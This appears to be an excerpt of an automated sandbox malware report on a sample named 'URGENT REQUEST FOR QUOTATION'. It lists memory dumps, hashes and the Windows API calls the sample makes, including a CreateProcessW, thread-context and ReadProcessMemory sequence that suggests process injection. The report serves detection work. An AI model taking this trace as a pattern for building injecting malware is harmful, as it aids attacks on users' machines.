                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146820519-0
                                                                                                                      • Opcode ID: e751f8d5bd328af0c169b3d2e8f8a872b5e84a8b979d60a767f3b1083593be22
                                                                                                                      • Instruction ID: 7251716b715d9ac36e0e1feaee466f7da4e5e2c1d3c22304b37f8680f36e3c59
                                                                                                                      • Opcode Fuzzy Hash: e751f8d5bd328af0c169b3d2e8f8a872b5e84a8b979d60a767f3b1083593be22
                                                                                                                      • Instruction Fuzzy Hash: A5127B719083019FD764DF28C484BAABBE9FF85314F04895DE8899B262DB31ED45CF92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                                                                                                        • Part of subcall function 00031B4A: RegisterWindowMessageW.USER32(00000004,?,000312C4), ref: 00031BA2
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003136A
                                                                                                                      • OleInitialize.OLE32 ref: 00031388
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 000724AB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986988660-0
                                                                                                                      • Opcode ID: fd85bd33c1df2d9d0f213b40928aad9b2963d226eda421b493c45578a1e4aca2
                                                                                                                      • Instruction ID: adebd1933317dabbf69f7c1e73af58d23cb3b17d076f0fa0e7f4a99294e1ac8b
                                                                                                                      • Opcode Fuzzy Hash: fd85bd33c1df2d9d0f213b40928aad9b2963d226eda421b493c45578a1e4aca2
                                                                                                                      • Instruction Fuzzy Hash: CA71A2B4901200AFD385DF79ED45A953AE5FB8A340754812EE0CADBAB2EBFC4581CF41
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00033923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00033A04
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0009C259
                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 0009C261
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0009C270
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3500052701-0
                                                                                                                      • Opcode ID: 73221a34ca77207e4fac09262551925f07e63465e8db82ab4756b26279f4e211
                                                                                                                      • Instruction ID: 0d75c218171c186c0c86603c5fa59ae77828a3142277623e5826c136da48bb90
                                                                                                                      • Opcode Fuzzy Hash: 73221a34ca77207e4fac09262551925f07e63465e8db82ab4756b26279f4e211
                                                                                                                      • Instruction Fuzzy Hash: 6B318170904384AFFF729B64C895FEBBBECAB06308F04449AE5DE97241C7745A84DB51
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,000685CC,?,000F8CC8,0000000C), ref: 00068704
                                                                                                                      • GetLastError.KERNEL32(?,000685CC,?,000F8CC8,0000000C), ref: 0006870E
                                                                                                                      • __dosmaperr.LIBCMT ref: 00068739
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2583163307-0
                                                                                                                      • Opcode ID: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                                                                                                      • Instruction ID: e77c40e0a1a19a6aa65ad04b2b4db1b3f317515e4f1d2a3038c1e7443bb53d85
                                                                                                                      • Opcode Fuzzy Hash: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                                                                                                      • Instruction Fuzzy Hash: 23016B3260427026D2B06334EC45BBE27CB4B81B75F384319F9489B1D3DEA0CD818350
                                                                                                                      APIs
                                                                                                                      • TranslateMessage.USER32(?), ref: 0003DB7B
                                                                                                                      • DispatchMessageW.USER32(?), ref: 0003DB89
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB9F
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0003DBB1
                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00081CC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3288985973-0
                                                                                                                      • Opcode ID: 9c5d637a45da49c208b806f6e7dde87f496d2ed642357cc12f27bf98d4859aa9
                                                                                                                      • Instruction ID: 49eccf7c717a121d86d8194482226e28616f97d801ba1c18c8532141d9f77e52
                                                                                                                      • Opcode Fuzzy Hash: 9c5d637a45da49c208b806f6e7dde87f496d2ed642357cc12f27bf98d4859aa9
                                                                                                                      • Instruction Fuzzy Hash: D4F05E306443809BF770DB60DC89FEA73ECFF44310F104A1AE64A830C0DB74A4899B15
                                                                                                                      APIs
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 000417F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Init_thread_footer
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                                      • Opcode ID: 0100c7bbac2e11f2413440eef7d526d27f9724829b2b44210efc27d73449d02f
                                                                                                                      • Instruction ID: 131d13fdc4c87afe9fefdfac8545a3c5f6b897048f6797496ca4810a25eefa46
                                                                                                                      • Opcode Fuzzy Hash: 0100c7bbac2e11f2413440eef7d526d27f9724829b2b44210efc27d73449d02f
                                                                                                                      • Instruction Fuzzy Hash: D7228CB0608201DFC764DF14C484BAABBF1BF85314F15892DF4968B3A2D772E985CB46
                                                                                                                      APIs
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00072C8C
                                                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                                                        • Part of subcall function 00032DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 779396738-3081909835
                                                                                                                      • Opcode ID: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                                                                                                      • Instruction ID: 05ab4bbd3d5b030ec6946f69fa90b3635db417b9cf5f481a41f8a97cc44a9713
                                                                                                                      • Opcode Fuzzy Hash: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                                                                                                      • Instruction Fuzzy Hash: 3521A871E0025C9FDB42EF94C845BEE7BFCAF49714F008059E505B7241DBB85A898FA1
                                                                                                                      APIs
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1144537725-0
                                                                                                                      • Opcode ID: 6ad3271b2879758355f74156c71f4507e02d15559dba9b44d75e302d5804863e
                                                                                                                      • Instruction ID: b07283d3c423edfc6c6257780c463192faa4991bb9b3b0b77939080407e8d0fc
                                                                                                                      • Opcode Fuzzy Hash: 6ad3271b2879758355f74156c71f4507e02d15559dba9b44d75e302d5804863e
                                                                                                                      • Instruction Fuzzy Hash: 3B319370904301DFE761DF24D884B9BBBE8FB49719F00092EF5DA87641E7B5AA44CB52
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00035773
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00074052
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 3825175a88cf96097f5ba2d5498cc5af43a02d955c912096308ead8ad2fa563a
                                                                                                                      • Instruction ID: fff1b8bd7e689d600b43b52fbe58a9c6756cfe4e3882ba507494bea2bcaff2a9
                                                                                                                      • Opcode Fuzzy Hash: 3825175a88cf96097f5ba2d5498cc5af43a02d955c912096308ead8ad2fa563a
                                                                                                                      • Instruction Fuzzy Hash: 07018030145225B6E3720A2ADC0EF977F98EF067B1F148200BA9D5A1E0C7B45854CBD0
                                                                                                                      APIs
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0003BB4E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Init_thread_footer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1385522511-0
                                                                                                                      • Opcode ID: b9d0bb2e6c18ae78193d4c2b9b6f470dd15511025b78a3449c588b0fd13efe51
                                                                                                                      • Instruction ID: 1ab05e007a4908f63834a4ab4a4743e44b945f5a79467c853724db3472ae997d
                                                                                                                      • Opcode Fuzzy Hash: b9d0bb2e6c18ae78193d4c2b9b6f470dd15511025b78a3449c588b0fd13efe51
                                                                                                                      • Instruction Fuzzy Hash: 1932DF30A00209DFDB61DF54C898BBEB7F9FF44318F14805AEA85AB251C7B4AE45CB51
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01B643A3
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B64439
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B6445B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1794132776.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B62000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1b62000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                                                      • Instruction ID: 3b045aa349f88f2930fd6b4801b033cc6cbd2d4d6a5744fe69b5542423ba9e73
                                                                                                                      • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                                                                                      • Instruction Fuzzy Hash: 9F12DD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: 65f49407338b2ccd74a4537c5ee3235da69a5044377b6247d62ddcf88a698c8f
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: B731D2B5A0010ADBC768CF59D5C0A69FBA6FF49300B2486B5E80ACB656D731EDC1CBD4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00034E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                                                                                                        • Part of subcall function 00034E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                                                                                                        • Part of subcall function 00034E90: FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                                                                                                        • Part of subcall function 00034E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                                                                                                        • Part of subcall function 00034E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                                                                                                        • Part of subcall function 00034E59: FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2632591731-0
                                                                                                                      • Opcode ID: 5bcb315241e1d961fc91645c6350c756c6ce8997a3ae639df69febc11a139ad9
                                                                                                                      • Instruction ID: 72bef9c433e68c672bc3e7a81239151b9055e0a5b278dc4dcac86c9fe5f09503
                                                                                                                      • Opcode Fuzzy Hash: 5bcb315241e1d961fc91645c6350c756c6ce8997a3ae639df69febc11a139ad9
                                                                                                                      • Instruction Fuzzy Hash: 6211E336600205AEDB26AFA4DC02FED77A9AF40711F14842DF546AA1D2EE74AA059B50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wsopen_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3347428461-0
                                                                                                                      • Opcode ID: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                                                                                                      • Instruction ID: 0820ce8073b5f2ab3fd73f04513afe748f3e9fa2b1c0ae3a04001677ec502251
                                                                                                                      • Opcode Fuzzy Hash: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                                                                                                      • Instruction Fuzzy Hash: E411487590410AAFCB05DF58E940ADE7BF9EF48300F108199F808AB312DA30DA11CBA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                      • Instruction ID: 1782a8536c53d766531505b619d84a6c6440cede04705bc4dedab116fc7f5cd2
                                                                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                      • Instruction Fuzzy Hash: 39F02832510E109AD7353A69DC05BDB379A9F523F7F100716FCA1931D3CB74DA0A86A5
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 176396367-0
                                                                                                                      • Opcode ID: daa1ec522d7e5d217855691e78f7439a1b365263ee3c5ae7c9657e0e4f3ea7de
                                                                                                                      • Instruction ID: e6c48aaa18abc67b7402b8c751b5dfa0ef36b86e62dd72e05c730ec2fd40093a
                                                                                                                      • Opcode Fuzzy Hash: daa1ec522d7e5d217855691e78f7439a1b365263ee3c5ae7c9657e0e4f3ea7de
                                                                                                                      • Instruction Fuzzy Hash: C7F0C8B36006016ED7259F29D807AABBB98EF44760F10853AFA19CB1D2DB71E514C7A4
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                                                      Memory Dump Source
